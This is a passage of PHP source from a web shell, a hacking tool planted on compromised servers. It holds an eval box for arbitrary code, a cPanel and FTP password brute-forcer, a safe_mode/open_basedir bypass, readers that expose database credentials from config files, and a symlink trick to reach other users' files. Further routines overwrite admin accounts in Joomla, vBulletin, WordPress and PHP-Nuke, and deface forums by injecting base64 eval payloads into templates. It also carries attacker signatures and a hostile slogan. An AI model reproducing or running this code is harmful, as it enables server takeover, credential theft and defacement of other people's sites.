for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.....";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "OK<br>";
flush();
}
}
}
}
echo '</table>';
break;
case 'jpc':
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"database\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"db_user\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br>
<br>
Set A New username For Login : <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
Don`t Change it Password is : 123456: <INPUT name=\"pwd\" size=\"15\" value=\"e10adc3949ba59abbe56e057f20f883e\"><br>
<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
if($SQL){
echo "<b>Success :Now Use A New User And Password - (123456)";
}
}
break;
case 'eval':
echo "
<form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
<td width='12' height='21' style='background-color:".$shellColor."'> </td>
<tr><td height='45' colspan='2'>
<input type='text' name='php_eval' size='70' value='echo \"Fuck 4 Israel\";'>
<input type=submit name=submitEval value=Eval></td></tr></table></form>";
print "<h1>Output:</h1>";
print "<br>
";
if($_POST['submitEval']) // Execute Eval Code .
{
$eval = @str_replace("<?php","",$_POST['php_eval']);
$eval = @str_replace("<?php","",$eval);
$eval = @str_replace("?>","",$eval);
$eval = @str_replace("\\","",$eval);
echo eval($eval);
}
break;
case "domains":
echo "<p align=center><font color='red' size='5'>[ Domains & Users ]</font></p>";
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }
echo "<table align=center border=1 width='460' style='border:1px dotted white; color:#FFB200; font-family:Tahoma; font-size:10pt; background-color:#000000'>
<tr bgcolor=green><td><font color=lime size=3><b>Domains</b></font></td><td><font color=lime size=3><b>Users</b></font></td></tr>";
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
}}}
echo "</table>";
break;
case 'chmod':
if(isset($_POST['chmod']))
{
switch ($_POST['chvalue']){
case 777:
chmod($_POST['chmod'],0777);
break;
case 644:
chmod($_POST['chmod'],0644);
break;
case 755:
chmod($_POST['chmod'],0755);
break;
}
print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
}
if(isset($_GET['file']))
{
$content = urldecode($_GET['file']);
}
else
{
$content = "file/path/please";
}
print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
<input type=text name=chmod value=\"".$content."\" size=70 style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'><br><b>New permission:</b>
<select name='chvalue' style='color: #ffffff; border: 1px dotted #a0ff00; background-color: #000000'>
<option value='777'>777</option>
<option value='644'>644</option>
<option value='755'>755</option>
</select><input type=submit value='Change' style='color: #ffffff; border: 1px dotted #ff0000; background-color: #000000'>";
break;
case 'mysql':
if(isset($_POST['host']))
{
$link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
mysql_select_db($_POST['dbase']);
$sql = $_POST['query'];
$result = mysql_query($sql);
}
else
{
print "
This only queries the database, doesn't return data!<br>
<form action=\"".$me."?p=mysql\" method=POST>
<b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
<b>Username:<br><input type=text name=username value=\"root\" size=10><br>
<b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
<b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
<b>Query:<br></b<textarea name=query></textarea>
<input type=submit value=\"Query database\">
</form>
";
}
break;
case 'createdir':
if(mkdir($_GET['crdir']))
{
print 'Directory created successfully.';
}
else
{
print 'Couldn\'t create directory';
}
break;
case 'vbhack':
$act = $_GET['act'];
if($act=='reconfig' && isset($_POST['path']))
{
$path = $_POST['path'];
include $path;
echo '<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th><font color=green>::::Read Config Data::::</font></th><th>';
echo '<font color=yellow>' . $path . '</font></th>';
echo '<tr>
<th><font color=green>Host : </font></th><th><font color=yellow>' . $config['MasterServer']['servername'] . '</font></th>
</tr>
<tr>
<th><font color=green>User : </font></th><th><font color=yellow>' . $config['MasterServer']['username'] . '</font></th>
</tr>
<tr>
<th><font color=green>Pass : </th><th>';
$passsql = $config['MasterServer']['password'];
if ($passsql == '')
{
$result = '<font color=red>No Password</font>';
} else {
$result = '<font color=yellow>' . $passsql . '</font>';
}
echo $result;
echo '</th>
</tr>
<tr>
<th><font color=green>Name : </font></th><th><font color=yellow>' . $config['Database']['dbname'] . '</font></th>
</tr>
</table>';
}
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset
($_POST['vbuser']) && isset($_POST['vbpass']))
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
$vbuser = $_POST['vbuser'];
$vbpass = $_POST['vbpass'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font
color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font
color=yellow>' . $db . '</font></font>';
$query = 'select * from user where username="' . $vbuser . '";';
$result = mysql_query($query);
while ($row = mysql_fetch_array($result))
{
$salt = $row['salt'];
$x = md5($vbpass);
$x =$x . $salt;
$pass_salt = md5($x);
$query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";';
$re = mysql_query($query);
if ($re)
{
echo '<font size=3><font color=yellow>The pass of the user </font><font color=red>' . $vbuser . '</font><font color=yellow>
was changed to </font><font color=red>' . $vbpass . '</font><br>Back to <a href="?">Shell</a></font>';
} else {
echo '<font size=3><font color=red>Failed to change PassWord</font></font>';
}
}
}
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login")
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font
color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font
color=yellow>' . $db . '</font></font>';
echo '<hr color="#00FF00" />
<form name="changepass" action="?p=vbhack&act=psw" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::Change User Password:::::</th><th><input type="submit" name="Change" value="Change" /></th>
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
<tr><td>Pass : </td><td><input name="vbpass" value="DrZer0" /></td></tr>
</table>';
echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input
type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
echo '
</form>
<hr color="#00FF00" />
<form name="changepass" action="?p=vbhack&act=mail" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::Change User E-MAIL:::::</th><th><input type="submit" name="Change" value="Change" /></th>
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
<tr><td>MAIL : </td><td><input name="vbmail" value="[email protected]" /></td></tr>
</table>';
}
if ($act == ''){
echo '
<form name="myform" action="?p=vbhack&act=login" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect"
/></th><tr><td><font color=yellow>Host : </td><td><input name="host" value="localhost" /></td></tr>
<tr><td><font color=yellow>User : </td><td><input name="user" value="root" /></td></tr>
<tr><td><font color=yellow>Pass : </td><td><input name="pass" value="" /></td></tr>
<tr><td><font color=yellow>Name : </td><td><input name="db" value="vb" /></td></tr>
</table>
</form>';
}
if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db']))
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font
color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font
color=yellow>' . $db . '</font></font>';
echo '
<hr color="#00FF00" />';
$re = mysql_query('select * from user');
echo'<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th><font color=lime>ID</th><th><font color=lime>UserName</th><th><font
color=lime>E-Mail</th><th><font color=lime>PassWord</th></font></font></font></font></font>';
while ($row = mysql_fetch_array($re))
{
echo'<tr><td>' . $row['userid'] . '</td><td>' . $row['username'] . '</td><td>' . $row['email'] . '</td><td>' . $row
['password'] . '</td></tr>';
}
echo'</table>';
echo '
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th>';
$count = mysql_num_rows($re);
echo 'Number of users registered is : [ ' . $count . ' ]';
echo '</th></table>';
}
if ($act == 'users'){
echo '
<form name="myform" action="?p=vbhack&act=lst" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect"
/></th><tr><td><font color=yellow>Host : </td><td><input name="host" value="localhost" /></td></tr>
<tr><td><font color=yellow>User : </td><td><input name="user" value="root" /></td></tr>
<tr><td><font color=yellow>Pass : </td><td><input name="pass" value="" /></td></tr>
<tr><td><font color=yellow>Name : </td><td><input name="db" value="vb" /></td></tr>
</table>
</form>';
}
if ($act=='config')
{
echo '
<form name="myform" action="?p=vbhack&act=reconfig" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::CONFIG PATH:::::</th><th><input type="submit" name="Connect" value="Read" /></th>
<tr><td>PATH : </td><td><input name="path" value="/home/User/public_html/vb/includes/config.php"
/></td></tr></table></form>';
}
echo '
<center>
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><td><a href="?p=vbhack&act=users"><font color=red size=5>List
Users</a></td><td><a href="?p=vbhack&act=config"><font color=red size=5>ReadConfig</a></td></tr></table>';
break;
case 'cpanelftp':
echo "</td></tr></form>
</td>
<td valign='top'>
<!-- Cpanel And FTP BruteForce Attacker -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
<center>
<textarea style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000' rows='12' name='users' cols='23' >";
@system('ls /var/mail');
echo "</textarea>
<textarea style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000' rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\nabc123\n112233\n332211\nasd123\nadmin123\npassword\npass123\nwebmaster\nadminpass</textarea>
<center> <input type='text' name='target' size='16' value='localhost' style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#60c0ff; background-color:#000000'>
<input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
<input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
<input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndFTP' style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#60c0ff; background-color:#000000' >
</td></tr></table></form>
</td>
<td valign='top'>
";
if($_POST['BruteForceCpanelAndFTP'])
{
$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['BruteForceCpanelAndFTP'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if(empty($target))
{
$target = "localhost";
}
function ftp_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "</table>Error : Connection Timeout Please Check The Target Hostname .";
exit;
}
elseif ( curl_errno($ch) == 0 )
{
print "<br><b><font color=red>[+] Cracking Success With Username <font color=lime>($user)<font color=red> and Password <font color=lime>($pass)</font>";
}
curl_close($ch);
}
function cpanel_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "[-] Connection Timeout Please Check The Target Hostname .";
exit;
}
elseif ( curl_errno($ch) == 0 )
{
print "<br><b><font color=red>[+] Cracking Success With Username <font color=lime>($user)<font color=red> and Password <font color=lime>($pass)</font>";
}
curl_close($ch);
}
if(isset($submit) && !empty($submit))
{
if(empty($users) && empty($pass))
{
print "<b><font color=40c0ff>[-] Please Check The Users or Password List Entry . . .";
}
if(empty($users))
{
print "<b><font color=40c0ff>[-] Please Check The Users List Entry . . .";
}
if(empty($pass))
{
print "<b><font color=40c0ff>[-] Please Check The Password List Entry . . ";
}
$userlist=explode("\n",$users);
$passlist=explode("\n",$pass);
print "</table><b><font color=40c0ff>[~]# Cracking Process Started, Please Wait ...";
foreach ($userlist as $user)
{
$pureuser = trim($user);
foreach ($passlist as $password )
{
$purepass = trim($password);
if($cracktype == "ftp")
{
ftp_check($target,$pureuser,$purepass,$connect_timeout);
}
if ($cracktype == "cpanel")
{
cpanel_check($target,$pureuser,$purepass,$connect_timeout);
}
}
}
}
}
break;
case 'bypass':
if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
echo '<table bgcolor=#cccccc width=\"100%\">
<tbody><tr><td align=\"right\" width=100>
<p dir=ltr><font color=#990000 size=5><center> <br> PHP 5.2.9 | 5.2.11 safe_mode & open_basedir bypass <br><br>
</font><form name="form" method="post">
<input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="Show"></form></center>';
$level=0;
if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$level++;
}
}
while($level--) chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
echo '<FONT COLOR="RED"> <center><textarea rows="40" cols="120">';
if(curl_exec($ch)==FALSE)
die(' Sorry...'.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
echo ' </textarea> </center></FONT>';
break;
case 'Encypton':
echo "
<table bgcolor=#cccccc width=\"100%\">
<tbody><tr><td align=\"right\" width=100>
<p dir=ltr><b><font color=white size=5><br><p align=left><center>
Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )<br><br>
<form method=\"POST\">
<font color=\"gray\">String To Encrypt : </font><input type=\"text\" value=\"\" name=\"ENCRYPTION\">
<input type=\"submit\" value=\"Submit\"></form>";
if(!$_POST['ENCRYPTION']=='')
{
$md5 = $_POST['ENCRYPTION'];
echo "<font size=2><font color=gray>MD5 : </font>".md5($md5)."<br>";
echo "<font color=gray>Base64 : </font>".base64_encode($md5)."<br>";
echo "<font color=gray>Crypt : </font>".CRYPT($md5)."<br>";
echo "<font color=gray>SHA1 : </font>".SHA1($md5)."<br>";
echo "<font color=gray>MD4 : </font>".hash("md4",$md5)."<br>";
echo "<font color=gray>SHA256 : </font>".hash("sha256",$md5)."<br>";
}
break;
case 'phpinfo':
echo '</table></head></style></html></body></table></head></style></html></body>';
phpinfo();
echo '</table></head></style></html></body></table></head></style></html></body>';
break;
case 'rename':
if(isset($_POST['fileold']))
{
if(rename($_POST['fileold'],$_POST['filenew']))
{
print "File renamed.";
}
else
{
print "Couldn't rename file.";
}
}
if(isset($_GET['file']))
{
$file = basename(htmlspecialchars($_GET['file']));
}
else
{
$file = "";
}
print "Renaming ".$file." in folder ".realpath('.').".<br>
<form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
<b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
<b>To:<br><input type=text name=filenew value=\"\" size=10><br>
<input type=submit value=\"Rename file\">
</form>";
break;
case 'scahlf':
echo "<html>
</td></tr></table><form method='POST' enctype='multipart/form-data' >
</td></tr></table><form method='POST' enctype='multipart/form-data' >
<br>
<b>show_source : </b><input type='text' name='show' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p>
<b>highlight_file : </b><input type='text' name='high' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p>
<input type='submit'' value='Read' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></form</p>
</form</p>";
if(empty($_POST['show']))
{
}
else
{
$s = $_POST['show'];
echo "<b><h1><font size='4' color='silver'>show_source</font></h1>";
$show = show_source($s);
}
if(empty($_POST['high']))
{
}
else
{
$h = $_POST['high'];
echo "<b><h1><font size='4' color='silver'>highlight_file</font></h1>";
echo "<br>";
$high = highlight_file($h);
}
break;
case 'tooliq':
$form = '<div align="center">
<form action="" method="POST" >
<input name="lo" type="text" value="Localhost" align="LEFT" size="20" /> <input name="db" type="text" value="Database" align="LEFT" size="20" onfocus="if (this.value == \'Database\') this.value = \'\';"/><br><font face=pristina color="#008000" size="4">:: |~ K ~| ::</font><Br><input name="user" type="text" value="Username" align="LEFT" size="12" onfocus="if (this.value == \'Username\') this.value = \'\';"/><input name="pass" type="text" value="PassWord" align="MIDDLE" size="13" onfocus="if (this.value == \'PassWord\') this.value = \'\';"/><input name="tab" type="text" value="TablePrefix" align="LEFT" size="12" onfocus="if (this.value == \'TablePrefix\') this.value = \'\';"/><br>
<input type="submit" value=" submit " />
</form></p>';
$fc = '<p align="center"><b><font face=pristina color="#008000" size="4">:: GreaTs ::</font></b></p>
<p align="center"><font face=pristina color="#008000" size="4">ALI-X ,El3akrab Elmodamer</font></p>
<p align="center"><b><font face=pristina color="#008000" size="4">:: |~ K ~| ::</font></b></p>
';
$x ='<body bgcolor=#000000>
<title>IQ SCRIPT</title>
<p align="center"><b><font face=pristina color="#008000" size="4">IQ SCRIPT<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<font face=pristina color="#008000" size="4">ADMIN\'S INFORMATIONS HAVE BEEN CHANGED<br> SUCCEFULLY !!<br>USERNAME : admin<br>PASSWORD : iraq </font>
<p align="center">
';
if ($_GET[a] == "vba"){
if ($_POST['db'] == ''){
echo '<title>vbadmin</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">vbadmin<br>~ Karar alShaMi ~</font></b></p>
<p align="center">';
print $form;
print $f;
}
if ($_POST['db'] != '')
{
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$z ="UPDATE `".$_POST['tab']."user` SET `username` = 'Karar alShaMi',
`password` = '9ce4d31a52f0a5c50d0b5652581c37fa',
`salt` = '{tg',`usergroupid` = '6' WHERE `".$_POST['tab']."user`.`userid` =1 LIMIT 1 ;";
$ka=@mysql_query($z) or die(mysql_error());
if ($ka){
print '<body bgcolor=#000000>
<title>IQ SCRIPT</title>
<p align="center"><b><font face=pristina color="#008000" size="4">IQ SCRIPT<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<font face=pristina color="#008000" size="4">ADMIN\'S INFORMATIONS HAVE BEEN CHANGED<br> SUCCEFULLY !!<br>USERNAME : Karar alShaMi<br>PASSWORD : iraq </font>
<p align="center">';
}
}
exit;
}
if ($_GET[a]=="wp"){
if ($_POST['db'] == ''){
print '
<title>wpadmin</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">wpadmin<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
';
print $form;
print $f;
}
if ($_POST['db'] != '')
{
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$z ="UPDATE `".$_POST['tab']."users` SET `user_login` = 'Karar alShaMi',
`user_pass` = '\$P\$B8hVXHMs071b.ZLWaIQ18qOKcoskst0',
`user_email` = '[email protected]',
`display_name` = 'Karar alShaMi' WHERE `".$_POST['tab']."users`.`ID` =1 LIMIT 1 ;";
$ka=@mysql_query($z) or die(mysql_error());
if ($ka){
print '
<body bgcolor=#000000>
<title>wpadmin</title>
<p align="center"><b><font face=pristina color="#008000" size="4">wpadmin<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<font face=pristina color="#008000" size="4">ADMIN\'S INFORMATIONS HAVE BEEN CHANGED<br> SUCCEFULLY !!<br>USERNAME : Karar alShaMi<br>PASSWORD : iraq </font>
<p align="center">
';
}
}
exit;
}
if ($_GET[a]=="sym"){
print"<title>SYMLINK</title>";
if ($_POST['o'] != "ok"){
print'<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">SYMLINK<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<div align="center">
<form action="" method="POST" >
<input name="usr" type="text" value="/home/victim_user/public_html/vb/includes/config.php" align="LEFT" size="50" /> <br><input name="my" type="text" value="'.@getcwd().'/file.txt" align="LEFT" size="50" /><Br>
<input type="hidden" name="o" value="ok">
<input type="submit" value=" Submit " />
</form></p>
';
print $f;
}
else{
$sym = @symlink("$_POST[usr]","$_POST[my]");
print '
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">SYMLINK<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<p align="center"><b><font face="Pristina" size="4" color="#008000">';
if ($sym){
print
'Done !!</p>
';}
else{print'Error<br>Cannot Be completed';}
print $f;
}
exit;
}
if ($_GET[a]=="nuke"){
if ($_POST['db'] == ''){
print '
<title>Nuke-admin</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">Nuke-admin<br>~ Karar alShaMi ~</font></b></p>
<p align="center">';
print $form;
print $f;
}
if ($_POST['db'] != '')
{
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$z ="UPDATE `".$_POST['tab']."_authors` SET `aid` = 'admin' ,`email` = '[email protected]',`pwd` = 'd3b1cee2327cfa357dabf0289958c024' LIMIT 1 ;";
$ka=@mysql_query($z) or die(mysql_error());
if ($ka){
print $x;
}
}
exit;
}
if ($_GET[a]=="indv"){
#header
print'<title>Vb index Changer</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">Vb index Changer<br>~ Karar alShaMi ~</font></b></p>
<p align="center"><font face=pristina color="#008000" size="4">';
$farm = '<div align="center">
<form name="frm" action="" method="POST" >
<input name="lo" type="text" value="Localhost" align="LEFT" size="18" /> <input name="db" type="text" value="Database" align="LEFT" size="18" onfocus="if (this.value == \'Database\') this.value = \'\';"/><Br><input name="user" type="text" value="Username" align="LEFT" size="15" onfocus="if (this.value == \'Username\') this.value = \'\';"/><input name="pass" type="text" value="Password" align="MIDDLE" size="15" onfocus="if (this.value == \'Password\') this.value = \'\';"/><input name="tab" type="text" value="TablePrefix" align="LEFT" size="15" onfocus="if (this.value == \'TablePrefix\') this.value = \'\';"/><br>
<textarea name="code" cols="41" rows="15" wrap="VIRTUAL" onfocus="if (this.value == \'YOUR InDeX\') this.value = \'\';">YOUR InDeX</textarea><br>
<input type="submit" value=" Change " />
';
$fotind = '<font face=pristina color="#008000" size="4">ChanGed Succefully !!</font>';
if ($_GET[ty]=="fhome" and $_POST[user] ==""){
print $farm;
print $f;
exit;}
elseif($_GET[ty]=="fhome" and $_POST[user] !="") {
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$inde =str_replace('\\','\\\\',$_POST[code]);
$n ='UPDATE `'.$_POST[tab].'template` SET `template` = \''.$inde.'\'WHERE `title` =\'FORUMHOME\';';
$ka=@mysql_query($n) or die(mysql_error());
if ($ka){
print $fotind;
}
exit;
}
if ($_GET[ty]=="css" && $_POST[user] ==""){
print $farm;
print $f;
exit;}
elseif($_GET[ty]=="css" and $_POST[user] !=""){
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$n = 'UPDATE `'.$_POST[tab].'style` SET `css` = \''.$_POST[code].'\', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
$ka=@mysql_query($n) or die(mysql_error());
if ($ka){
print $fotind;
}
exit;
}
if ($_GET[ty]=="spa" && $_POST[user] ==""){
print $farm;
print $f;
exit;}
elseif($_GET[ty]=="spa" and $_POST[user] !=""){
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$set_index = "{\${eval(base64_decode(\'";
$index=str_replace("\'","'",$_POST[code]);
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ka=@mysql_query("UPDATE ".$_POST[tab]."template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());
if ($ka){
print $fotind;
}
exit;
}if ($_GET[ty]=="hea" && $_POST[user] ==""){
print "<script>x=1</script>".$script.$farm;
print $f;
exit;}
elseif($_GET[ty]=="hea" and $_POST[user] !=""){
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$set_index = "{\${eval(base64_decode(\'";
$index=str_replace("\'","'",$_POST[code]);
$set_index .= base64_encode("echo \"$index\";");
